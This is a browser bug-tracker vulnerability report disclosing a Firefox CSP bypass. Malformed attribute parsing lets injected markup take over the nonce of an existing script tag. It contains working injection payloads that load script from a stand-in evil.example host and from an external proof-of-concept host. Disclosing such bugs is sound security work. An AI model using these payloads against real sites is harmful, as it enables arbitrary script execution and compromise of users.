1817272 - CSP bypass due to incorrect attribute parsing

Status: RESOLVED DUPLICATE of bug 1397308

(Core :: DOM: Security, defect)

Description

[Marco Squarcina]

Attachment: noncehijacking.js

We discovered a CSP bypass in Firefox due to a peculiar parsing of HTML attributes compared to other browsers. In Firefox, the HTML code <script <script nonce="abc"> is parsed as a single <script> node with 2 attributes:

• <script=""
• nonce="abc"

This is captured by the (failing) WPT test nonce-enforce-blocked.html.

This behavior enables an attacker with a markup injection on the page to bypass CSP by hijacking the valid nonce of an already existing <script> attribute. For instance, assuming that the CSP of the following page is Content-Security-Policy: script-src 'nonce-abc':

{INJECTION} <script nonce="abc" src="https://good.example/good.js"></script>

An attacker can execute arbitrary javascript by injecting <script src="https://evil.example/evil.js", resulting into the following code:

<script src="https://evil.example/evil.js" <script nonce="abc" src="https://good.example/good.js"></script>

A working demo of the attack can be tested at https://noncehijacking.minimal.blue/?foo=injection and triggered with the following payload:

• https://noncehijacking.minimal.blue/?foo=%3Cscript%20src=%22https://web.tecnico.ulisboa.pt/pedro.m.s.bernardo/noncehijackingpoc/attacker.js%22

The full NodeJS code of the PoC is attached to this vulnerability report.

Could you please CC Pedro Bernardo (user id 722366) to this report since we discovered the issue together?

Best regards